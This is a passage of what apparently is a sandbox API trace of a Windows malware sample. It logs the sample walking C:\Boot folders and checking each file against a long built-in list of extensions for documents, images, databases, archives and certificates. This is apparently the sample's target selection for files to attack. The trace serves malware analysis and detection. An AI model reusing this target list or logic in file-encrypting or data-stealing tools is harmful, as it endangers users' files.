returned -1 [0286.326] lstrlenW (lpString=".docm") returned 5 [0286.326] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.326] lstrlenW (lpString=".docx") returned 5 [0286.326] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.326] lstrlenW (lpString=".dot") returned 4 [0286.326] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dotm") returned 5 [0286.326] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.326] lstrlenW (lpString=".dotx") returned 5 [0286.326] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.326] lstrlenW (lpString=".dpx") returned 4 [0286.326] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dqy") returned 4 [0286.326] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dsn") returned 4 [0286.326] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dt") returned 3 [0286.326] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.326] lstrlenW (lpString=".dtd") returned 4 [0286.326] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dwg") returned 4 [0286.326] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dwt") returned 4 [0286.326] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".dx") returned 3 [0286.326] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.326] lstrlenW (lpString=".dxf") returned 4 [0286.326] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.326] lstrlenW (lpString=".edml") returned 5 [0286.326] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.326] lstrlenW (lpString=".efd") returned 4 [0286.327] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".elf") returned 4 [0286.327] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".emf") returned 4 [0286.327] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".emz") returned 4 [0286.327] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".epf") returned 4 [0286.327] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".eps") returned 4 [0286.327] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".epsf") returned 5 [0286.327] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.327] lstrlenW (lpString=".epsp") returned 5 [0286.327] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.327] lstrlenW (lpString=".erf") returned 4 [0286.327] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".exr") returned 4 [0286.327] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".f4v") returned 4 [0286.327] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".fido") returned 5 [0286.327] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.327] lstrlenW (lpString=".flm") returned 4 [0286.327] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".flv") returned 4 [0286.327] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".frm") returned 4 [0286.327] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.327] lstrlenW (lpString=".fxg") returned 4 [0286.328] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".geo") returned 4 [0286.328] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".gif") returned 4 [0286.328] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".grs") returned 4 [0286.328] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".gz") returned 3 [0286.328] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.328] lstrlenW (lpString=".h") returned 2 [0286.328] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.328] lstrlenW (lpString=".hdr") returned 4 [0286.328] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".hpp") returned 4 [0286.328] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".hta") returned 4 [0286.328] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".htc") returned 4 [0286.328] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".htm") returned 4 [0286.328] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".html") returned 5 [0286.328] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.328] lstrlenW (lpString=".icb") returned 4 [0286.328] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".ics") returned 4 [0286.328] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".iff") returned 4 [0286.328] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.328] lstrlenW (lpString=".inc") returned 4 [0286.329] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".indd") returned 5 [0286.329] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.329] lstrlenW (lpString=".ini") returned 4 [0286.329] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".iqy") returned 4 [0286.329] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".j2c") returned 4 [0286.329] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".j2k") returned 4 [0286.329] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".java") returned 5 [0286.329] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.329] lstrlenW (lpString=".jp2") returned 4 [0286.329] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".jpc") returned 4 [0286.329] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".jpe") returned 4 [0286.329] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".jpeg") returned 5 [0286.329] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.329] lstrlenW (lpString=".jpf") returned 4 [0286.329] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".jpg") returned 4 [0286.329] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".jpx") returned 4 [0286.329] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".js") returned 3 [0286.329] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.329] lstrlenW (lpString=".jsf") returned 4 [0286.329] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.329] lstrlenW (lpString=".json") returned 5 [0286.329] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.330] lstrlenW (lpString=".jsp") returned 4 [0286.330] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".kdc") returned 4 [0286.330] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".kmz") returned 4 [0286.330] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".kwm") returned 4 [0286.330] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".lasso") returned 6 [0286.330] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.330] lstrlenW (lpString=".lbi") returned 4 [0286.330] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".lgf") returned 4 [0286.330] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".lgp") returned 4 [0286.330] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".log") returned 4 [0286.330] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".m1v") returned 4 [0286.330] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".m4a") returned 4 [0286.330] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".m4v") returned 4 [0286.330] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".max") returned 4 [0286.330] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".md") returned 3 [0286.330] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.330] lstrlenW (lpString=".mda") returned 4 [0286.330] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".mdb") returned 4 [0286.330] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.330] lstrlenW (lpString=".mde") returned 4 [0286.331] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mdf") returned 4 [0286.331] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mdw") returned 4 [0286.331] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mef") returned 4 [0286.331] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mft") returned 4 [0286.331] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mfw") returned 4 [0286.331] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mht") returned 4 [0286.331] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mhtml") returned 6 [0286.331] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.331] lstrlenW (lpString=".mka") returned 4 [0286.331] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mkidx") returned 6 [0286.331] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.331] lstrlenW (lpString=".mkv") returned 4 [0286.331] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mos") returned 4 [0286.331] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mov") returned 4 [0286.331] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mp3") returned 4 [0286.331] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mp4") returned 4 [0286.331] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.331] lstrlenW (lpString=".mpeg") returned 5 [0286.331] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.331] lstrlenW (lpString=".mpg") returned 4 [0286.332] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.332] lstrlenW (lpString=".mpv") returned 4 [0286.332] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.332] lstrlenW (lpString=".mrw") returned 4 [0286.332] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.332] lstrlenW (lpString=".msg") returned 4 [0286.332] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.332] lstrlenW (lpString=".mxl") returned 4 [0286.332] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".myd") returned 4 [0286.332] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".myi") returned 4 [0286.332] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".nef") returned 4 [0286.332] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".nrw") returned 4 [0286.332] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".obj") returned 4 [0286.332] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".odb") returned 4 [0286.332] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".odc") returned 4 [0286.332] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".odm") returned 4 [0286.332] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".odp") returned 4 [0286.332] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".ods") returned 4 [0286.332] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.332] lstrlenW (lpString=".oft") returned 4 [0286.333] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".one") returned 4 [0286.333] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".onepkg") returned 7 [0286.333] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.333] lstrlenW (lpString=".onetoc2") returned 8 [0286.333] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.333] lstrlenW (lpString=".opt") returned 4 [0286.333] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".oqy") returned 4 [0286.333] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".orf") returned 4 [0286.333] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".p12") returned 4 [0286.333] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".p7b") returned 4 [0286.333] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".p7c") returned 4 [0286.333] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".pam") returned 4 [0286.333] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".pbm") returned 4 [0286.333] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".pct") returned 4 [0286.333] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".pcx") returned 4 [0286.333] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".pdd") returned 4 [0286.333] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.333] lstrlenW (lpString=".pdf") returned 4 [0286.334] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pdp") returned 4 [0286.334] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pef") returned 4 [0286.334] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pem") returned 4 [0286.334] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pff") returned 4 [0286.334] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pfm") returned 4 [0286.334] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pfx") returned 4 [0286.334] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".pgm") returned 4 [0286.334] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".php") returned 4 [0286.334] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.334] lstrlenW (lpString=".php3") returned 5 [0286.334] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.334] lstrlenW (lpString=".php4") returned 5 [0286.334] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.334] lstrlenW (lpString=".php5") returned 5 [0286.334] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.334] lstrlenW (lpString=".phtml") returned 6 [0286.334] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.334] lstrlenW (lpString=".pict") returned 5 [0286.334] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.334] lstrlenW (lpString=".pl") returned 3 [0286.334] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.335] lstrlenW (lpString=".pls") returned 4 [0286.335] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".pm") returned 3 [0286.335] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.335] lstrlenW (lpString=".png") returned 4 [0286.335] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".pnm") returned 4 [0286.335] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".pot") returned 4 [0286.335] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".potm") returned 5 [0286.335] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.335] lstrlenW (lpString=".potx") returned 5 [0286.335] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.335] lstrlenW (lpString=".ppa") returned 4 [0286.335] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".ppam") returned 5 [0286.335] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.335] lstrlenW (lpString=".ppm") returned 4 [0286.335] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".pps") returned 4 [0286.335] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".ppsm") returned 5 [0286.335] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.335] lstrlenW (lpString=".ppt") returned 4 [0286.335] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.335] lstrlenW (lpString=".pptm") returned 5 [0286.335] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.336] lstrlenW (lpString=".pptx") returned 5 [0286.336] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.336] lstrlenW (lpString=".prn") returned 4 [0286.336] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".ps") returned 3 [0286.336] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.336] lstrlenW (lpString=".psb") returned 4 [0286.336] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".psd") returned 4 [0286.336] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".pst") returned 4 [0286.336] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".ptx") returned 4 [0286.336] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".pub") returned 4 [0286.336] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".pwm") returned 4 [0286.336] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".pxr") returned 4 [0286.336] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".py") returned 3 [0286.336] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.336] lstrlenW (lpString=".qt") returned 3 [0286.336] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.336] lstrlenW (lpString=".r3d") returned 4 [0286.336] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".raf") returned 4 [0286.336] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.336] lstrlenW (lpString=".rar") returned 4 [0286.336] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.336] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.337] FindClose (in: hFindFile=0x3947ca8 | out: hFindFile=0x3947ca8) returned 1 [0286.337] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.337] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0286.337] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.337] lstrlenW (lpString="C:\\Boot\\lv-LV") returned 13 [0286.337] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0286.337] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.337] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.337] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.337] lstrlenW (lpString=".1cd") returned 4 [0286.337] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.337] lstrlenW (lpString=".3ds") returned 4 [0286.337] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.337] lstrlenW (lpString=".3fr") returned 4 [0286.337] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.337] lstrlenW (lpString=".3g2") returned 4 [0286.338] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".3gp") returned 4 [0286.338] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".7z") returned 3 [0286.338] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.338] lstrlenW (lpString=".accda") returned 6 [0286.338] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.338] lstrlenW (lpString=".accdb") returned 6 [0286.338] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.338] lstrlenW (lpString=".accdc") returned 6 [0286.338] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.338] lstrlenW (lpString=".accde") returned 6 [0286.338] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.338] lstrlenW (lpString=".accdt") returned 6 [0286.338] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.338] lstrlenW (lpString=".accdw") returned 6 [0286.338] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.338] lstrlenW (lpString=".adb") returned 4 [0286.338] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".adp") returned 4 [0286.338] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".ai") returned 3 [0286.338] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.338] lstrlenW (lpString=".ai3") returned 4 [0286.338] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".ai4") returned 4 [0286.338] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".ai5") returned 4 [0286.338] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".ai6") returned 4 [0286.338] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".ai7") returned 4 [0286.338] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.338] lstrlenW (lpString=".ai8") returned 4 [0286.339] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".anim") returned 5 [0286.339] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.339] lstrlenW (lpString=".arw") returned 4 [0286.339] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".as") returned 3 [0286.339] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.339] lstrlenW (lpString=".asa") returned 4 [0286.339] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".asc") returned 4 [0286.339] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".ascx") returned 5 [0286.339] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.339] lstrlenW (lpString=".asm") returned 4 [0286.339] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".asmx") returned 5 [0286.339] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.339] lstrlenW (lpString=".asp") returned 4 [0286.339] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".aspx") returned 5 [0286.339] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.339] lstrlenW (lpString=".asr") returned 4 [0286.339] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".asx") returned 4 [0286.339] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".avi") returned 4 [0286.339] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".avs") returned 